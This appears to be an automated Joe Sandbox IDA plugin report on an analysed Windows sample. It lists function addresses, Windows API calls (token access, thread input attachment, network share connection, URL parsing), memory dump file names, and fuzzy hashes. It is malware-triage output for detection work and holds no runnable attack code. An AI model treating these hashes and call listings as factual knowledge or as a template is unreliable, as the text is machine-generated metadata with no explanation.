            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateMessageObjectSendStockWindow
            • String ID:
            • API String ID: 3970641297-0
            • Opcode ID: 34ee23899f57256a416fc5fe97fa0a6e12b769006f5c9269c0d25e108b07b3f4
            • Instruction ID: 42826ba18676b81afc6eca754de618daa18a6281367c24d47305954646bbcc8a
            • Opcode Fuzzy Hash: 34ee23899f57256a416fc5fe97fa0a6e12b769006f5c9269c0d25e108b07b3f4
            • Instruction Fuzzy Hash: 991161B3501549BFEF224FA49C44EEA7B7DFF09364F054116FA14A2150D7369CA0EB90
            Function 00FC3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • ___BuildCatchObject.LIBVCRUNTIME ref: 00FC3B56
              • Part of subcall function 00FC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00FC3AD2
              • Part of subcall function 00FC3AA3: ___AdjustPointer.LIBCMT ref: 00FC3AED
            • _UnwindNestedFrames.LIBCMT ref: 00FC3B6B
            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00FC3B7C
            • CallCatchBlock.LIBVCRUNTIME ref: 00FC3BA4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
            • String ID:
            • API String ID: 737400349-0
            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
            • Instruction ID: fcba80b21ed17991236f34d21d0c8a764615c39458c8611f316002bdd3949036
            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
            • Instruction Fuzzy Hash: 2D01ED3250014ABBDF115E95CD47EEB7B7DEF98794F048018FE4856121C736E961EBA0
            Function 00FD3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FA13C6,00000000,00000000,?,00FD301A,00FA13C6,00000000,00000000,00000000,?,00FD328B,00000006,FlsSetValue), ref: 00FD30A5
            • GetLastError.KERNEL32(?,00FD301A,00FA13C6,00000000,00000000,00000000,?,00FD328B,00000006,FlsSetValue,01042290,FlsSetValue,00000000,00000364,?,00FD2E46), ref: 00FD30B1
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FD301A,00FA13C6,00000000,00000000,00000000,?,00FD328B,00000006,FlsSetValue,01042290,FlsSetValue,00000000), ref: 00FD30BF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 580cd1bc17edde233e62f70889c8e0b7ff3e660823dae65d0ed98b5b9ec424be
            • Instruction ID: 888e9246e4cfb6577db35b07da192bdc8d5b782af60976f5c6053fad9dab6342
            • Opcode Fuzzy Hash: 580cd1bc17edde233e62f70889c8e0b7ff3e660823dae65d0ed98b5b9ec424be
            • Instruction Fuzzy Hash: 7101F737B01222ABDB314A78AC48A577B9EAF05B75B180622FA45F3344C726D901D7E1
            Function 01007464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0100747F
            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01007497
            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 010074AC
            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 010074CA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Type$Register$FileLoadModuleNameUser
            • String ID:
            • API String ID: 1352324309-0
            • Opcode ID: b88e65acaaf1088aed0d9471a52a7cb92e2b9f712494bded0319a0e8da2aa459
            • Instruction ID: 6f94a98e3b9c53f19fd1a95703181710f34588d7f88b68b53bcbeedd793a166a
            • Opcode Fuzzy Hash: b88e65acaaf1088aed0d9471a52a7cb92e2b9f712494bded0319a0e8da2aa459
            • Instruction Fuzzy Hash: 92115BB5201305ABF7318F14ED09B967FFCEB00B04F01856AA6D6E6181DBB9F904CB60
            Function 0100B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
            Download Yara Rule
            APIs
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B0C4
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B0E9
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B0F3
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B126
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CounterPerformanceQuerySleep
            • String ID:
            • API String ID: 2875609808-0
            • Opcode ID: c6598b675106e3cc019c4df98b8ca6e4a47fac3c2a9ba47776feee7011ca5ae2
            • Instruction ID: 0bf307b3f98f6545c4a870455f2a125b5e57c9f6eeb719ed46911f432eb7888a
            • Opcode Fuzzy Hash: c6598b675106e3cc019c4df98b8ca6e4a47fac3c2a9ba47776feee7011ca5ae2
            • Instruction Fuzzy Hash: A0115B35C0161CE7EF11EFE4E958AEEBFB8FF0A711F404086E981B2185CB3596608B91
            Function 01002DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
            Download Yara Rule
            APIs
            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01002DC5
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 01002DD6
            • GetCurrentThreadId.KERNEL32 ref: 01002DDD
            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01002DE4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
            • String ID:
            • API String ID: 2710830443-0
            • Opcode ID: c355c16005aa87c70d71afc72b2f06cdc244f8e718d1d51bc0f3eefd86bdf867
            • Instruction ID: eadb4648a2b5065c50888a8485e4ec183229f15b51a4724b06af04f31de77914
            • Opcode Fuzzy Hash: c355c16005aa87c70d71afc72b2f06cdc244f8e718d1d51bc0f3eefd86bdf867
            • Instruction Fuzzy Hash: 1DE06D711012247AFB312A669D0DEEB3E6CEB46BA1F000056B245E1080DAAAD840D7B0
            Function 01038863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB9693
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96A2
              • Part of subcall function 00FB9639: BeginPath.GDI32(?), ref: 00FB96B9
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96E2
            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01038887
            • LineTo.GDI32(?,?,?), ref: 01038894
            • EndPath.GDI32(?), ref: 010388A4
            • StrokePath.GDI32(?), ref: 010388B2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
            • String ID:
            • API String ID: 1539411459-0
            • Opcode ID: 73975c259957d958623dceafe2223b87e8c12529991245b41a14be87fd056e81
            • Instruction ID: a4c7066b602399a29dbaf9ff92e38263496d5f861755071cc48118d9d4b971d4
            • Opcode Fuzzy Hash: 73975c259957d958623dceafe2223b87e8c12529991245b41a14be87fd056e81
            • Instruction Fuzzy Hash: BEF05E36045658BAEB225F98AD09FCE3F6DAF06310F048142FB92B50D5C7BA5111DFE5
            Function 00FB98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
            Download Yara Rule
            APIs
            • GetSysColor.USER32(00000008), ref: 00FB98CC
            • SetTextColor.GDI32(?,?), ref: 00FB98D6
            • SetBkMode.GDI32(?,00000001), ref: 00FB98E9
            • GetStockObject.GDI32(00000005), ref: 00FB98F1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$ModeObjectStockText
            • String ID:
            • API String ID: 4037423528-0
            • Opcode ID: e40f49c524f0689c28083ac2f64e0e7a30b2f948a864171c16972a74d66e155a
            • Instruction ID: 845e3cee4b843cac57105d70ba495c7d051706d5cc4fa1fcb4278ee1f40be894
            • Opcode Fuzzy Hash: e40f49c524f0689c28083ac2f64e0e7a30b2f948a864171c16972a74d66e155a
            • Instruction Fuzzy Hash: CAE06531644284AAEB315B75A909BE87F14AB12335F08821AF7F5A40E4C3764640AB10
            Function 0100162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThread.KERNEL32 ref: 01001634
            • OpenThreadToken.ADVAPI32(00000000,?,?,?,010011D9), ref: 0100163B
            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010011D9), ref: 01001648
            • OpenProcessToken.ADVAPI32(00000000,?,?,?,010011D9), ref: 0100164F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CurrentOpenProcessThreadToken
            • String ID:
            • API String ID: 3974789173-0
            • Opcode ID: 49b9439d9e465a92d935cc318c46c6d0fcd927680aa5357c3c24b24bd2b9f6b9
            • Instruction ID: 1017b68610f2ecbeecca109a9ae64ca5af65865275d7350cb7bd77610982077e
            • Opcode Fuzzy Hash: 49b9439d9e465a92d935cc318c46c6d0fcd927680aa5357c3c24b24bd2b9f6b9
            • Instruction Fuzzy Hash: E8E08636601211ABF7701FA49F0DB867BBDAF45791F144849F2C5E9084D7398044C750
            Function 00FFD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
            Download Yara Rule
            APIs
            • GetDesktopWindow.USER32 ref: 00FFD858
            • GetDC.USER32(00000000), ref: 00FFD862
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FFD882
            • ReleaseDC.USER32(?), ref: 00FFD8A3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: aee49924fcb9c4fc64c2457d1611a4194ce8fcf658088e342813794c94e1edd1
            • Instruction ID: 61c30c84e30561e46ef8c4d55d40bc22f859cb17649f1a3d96daa737d04afb9c
            • Opcode Fuzzy Hash: aee49924fcb9c4fc64c2457d1611a4194ce8fcf658088e342813794c94e1edd1
            • Instruction Fuzzy Hash: CAE01AB5800204DFDB51AFA0D60C66DBBBAFB08310F10800AF886F7254C73E9901BF50
            Function 00FFD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
            Download Yara Rule
            APIs
            • GetDesktopWindow.USER32 ref: 00FFD86C
            • GetDC.USER32(00000000), ref: 00FFD876
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FFD882
            • ReleaseDC.USER32(?), ref: 00FFD8A3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: 50d3188e558ac80316e17aaf28cfa4640d5f135fbbc23324bbd0f3c32e858d83
            • Instruction ID: 06312d4585edb2a85445dffa100523afb0999a51a29adf9ae52523176b5194c4
            • Opcode Fuzzy Hash: 50d3188e558ac80316e17aaf28cfa4640d5f135fbbc23324bbd0f3c32e858d83
            • Instruction Fuzzy Hash: 35E09AB5800604DFDB61AFA1D54C66DBBB9BB08311F14844AF986F7254D73D6901AF50
            Function 01014D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01014ED4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Connection_wcslen
            • String ID: *$LPT
            • API String ID: 1725874428-3443410124
            • Opcode ID: 050abfdc18c6658c52439f3cd51192f12fc17cd944ca41fd02ca4d0e9d570ee8
            • Instruction ID: 5eca0da879f2d026ed517ad32434d8eb1100abfee5ec26e0a31d104fc2258d42
            • Opcode Fuzzy Hash: 050abfdc18c6658c52439f3cd51192f12fc17cd944ca41fd02ca4d0e9d570ee8
            • Instruction Fuzzy Hash: AE919075A002049FDB15DF58C884EAABBF1AF45304F1980DDE84A9F3A6C739ED85CB90
            Function 00FCE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
            Download Yara Rule
            APIs
            • __startOneArgErrorHandling.LIBCMT ref: 00FCE30D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorHandling__start
            • String ID: pow
            • API String ID: 3213639722-2276729525
            • Opcode ID: 27924e32545259f5fbdd5395a28778df0c84da0993e0524decf69b9d4db564a5
            • Instruction ID: f10aee7e185f076963cd76ccc57f357aba3402f4bfc2d936032108cfc4663faf
            • Opcode Fuzzy Hash: 27924e32545259f5fbdd5395a28778df0c84da0993e0524decf69b9d4db564a5
            • Instruction Fuzzy Hash: A3515A71E0C30396CB257714DB43BBA3B969B40760F28496EE0D54A399FB398C85BA46
            Function 00FBE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: #
            • API String ID: 0-1885708031
            • Opcode ID: ba0cf93afb63e9c0ca52887d6dcffa9b0cd8ac4467f7cb03163d6d2d4b7f7a6a
            • Instruction ID: 3f676cc58469b6e22fb415579bd4665bef81359d085d43490eb06ac1a8336cc7
            • Opcode Fuzzy Hash: ba0cf93afb63e9c0ca52887d6dcffa9b0cd8ac4467f7cb03163d6d2d4b7f7a6a
            • Instruction Fuzzy Hash: 79512776D0424ADFDB15EF28C4816FA7BA4EF55320F244065FDA19B2E0D7389D42EB90
            Function 00FBF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNEL32(00000000), ref: 00FBF2A2
            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FBF2BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: GlobalMemorySleepStatus
            • String ID: @
            • API String ID: 2783356886-2766056989
            • Opcode ID: bccdeb091e001b34a05bb84687a4349cef5ae9e5bd8f72692874b65be8ad372d
            • Instruction ID: 19fd029b93cb1faf630ae98cbb086f7502546fe38e90637e31559e18df074979
            • Opcode Fuzzy Hash: bccdeb091e001b34a05bb84687a4349cef5ae9e5bd8f72692874b65be8ad372d
            • Instruction Fuzzy Hash: 7A5135B15187449FD320AF10DC86BABBBF8FF85300F81885DF1D942195EB758529CB66
            Function 01025745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 010257E0
            • _wcslen.LIBCMT ref: 010257EC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BuffCharUpper_wcslen
            • String ID: CALLARGARRAY
            • API String ID: 157775604-1150593374
            • Opcode ID: beb75a7ca72eab080091319ec44cc393a02b3e18cd430f99026dc349728d0824
            • Instruction ID: da0b2f91401827f335ca4e7c32569299ae7f183cbf645b290a4520cdcf795cd0
            • Opcode Fuzzy Hash: beb75a7ca72eab080091319ec44cc393a02b3e18cd430f99026dc349728d0824
            • Instruction Fuzzy Hash: 4D41B075E002199FCB04DFA9CC818FEBBF5FF49320F104069E545A7292E7B59981CB90
            Function 0101D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
            Download Yara Rule
            APIs
            • _wcslen.LIBCMT ref: 0101D130
            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0101D13A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CrackInternet_wcslen
            • String ID: |
            • API String ID: 596671847-2343686810
            • Opcode ID: 12fc135f30fd3a2697ce00c6892b125e5df1664ac74aa54d33d68e52bd6dc1c6
            • Instruction ID: 6eaa72a6996f868b518adf9399ce46080ee42db064e54f46b61c9d9ec67adf75
            • Opcode Fuzzy Hash: 12fc135f30fd3a2697ce00c6892b125e5df1664ac74aa54d33d68e52bd6dc1c6
            • Instruction Fuzzy Hash: 1D312C75D00219ABDF15EFE4CC85AEEBFB9FF05300F000059F915A6166D739AA06DB54
            Function 0103356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(?,?,?,?), ref: 01033621
            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0103365C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
